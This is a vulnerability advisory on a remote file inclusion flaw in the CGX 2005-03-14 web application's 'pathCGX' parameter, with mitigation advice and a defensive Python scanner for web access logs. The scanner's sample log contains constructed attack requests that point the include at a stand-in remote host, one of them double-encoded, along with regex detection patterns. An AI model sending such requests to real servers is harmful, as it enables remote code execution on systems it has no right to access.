Vendor: CGX
By: GolD_M
CVSS: 7.5 (HIGH)
CWE: Remote File Include
Product Name: CGX
Affected Version From: CGX 2005-03-14
Affected Version To: CGX 2005-03-14
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2005
CGX 2005-03-14 (pathCGX) Remote File Include Vulnerabilities
The CGX 2005-03-14 application is vulnerable to remote file inclusion attacks. An attacker can exploit this vulnerability by sending a specially crafted request to the 'inc/mtdialogo.php', 'inc/ltdialogo.php', 'inc/login.php', or 'inc/logingecon.php' scripts with the 'pathCGX' parameter set to a malicious file. Because the scripts include the file that 'pathCGX' points to, this allows the attacker to execute arbitrary code on the affected system.
Mitigation:
To mitigate this vulnerability, update the CGX application to a patched version that addresses the remote file inclusion vulnerability. Additionally, implement strong input validation and filtering so that the 'pathCGX' parameter cannot be used for malicious file inclusion.
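For detection, the following added example (not part of the original advisory or of CGX) scans web access log lines for requests to the four affected scripts that carry a client-supplied 'pathCGX' value. The combined log format, the sample lines, and the assumption that clients never legitimately send 'pathCGX' are all assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Scripts and parameter named in the advisory (PHP variable names are case-sensitive).
CGX_SCRIPTS = ("/inc/mtdialogo.php", "/inc/ltdialogo.php",
               "/inc/login.php", "/inc/logingecon.php")
PARAM = "pathCGX"
# Request portion of a combined-format log line (assumed format); GET queries only.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Values that start with a URL/stream-wrapper scheme, "//" or a UNC prefix.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]+:|//|\\\\)', re.I)

# Constructed sample input (documentation addresses, .invalid host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /cgx/inc/login.php HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /cgx/inc/mtdialogo.php?pathCGX=http://host.example.invalid/a.txt? HTTP/1.1" 200 90',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /cgx/inc/logingecon.php?pathCGX=%2568ttp%3A%2F%2Fhost.example.invalid%2Fa HTTP/1.0" 200 90',
    '192.0.2.7 - - [01/Jan/2024:10:01:00 +0000] "GET /cgx/inc/ltdialogo.php?pathCGX=../ HTTP/1.1" 200 300',
    '192.0.2.7 - - [01/Jan/2024:10:01:02 +0000] "GET /index.php?pathCGX=http://host.example.invalid/a HTTP/1.1" 404 0',
]

def fully_unquote(value, rounds=3):
    """Undo nested percent-encoding (bounded) so double-encoded values resolve."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(line):
    """Return None, 'param-present' or 'remote-include' for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    try:
        parts = urlsplit(m.group("target"))
    except ValueError:  # malformed request target
        return None
    path = fully_unquote(parts.path).lower()
    if not any(script in path for script in CGX_SCRIPTS):
        return None
    verdict = None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == PARAM:
            if REMOTE_RE.match(fully_unquote(value)):
                return "remote-include"
            verdict = "param-present"
    return verdict

def scan(lines):
    return [(n, v) for n, l in enumerate(lines, 1) if (v := classify(l))]
```

Access logs normally record only the query string, so a 'pathCGX' value sent in a POST body or cookie would need request-body logging or a WAF rule to be seen.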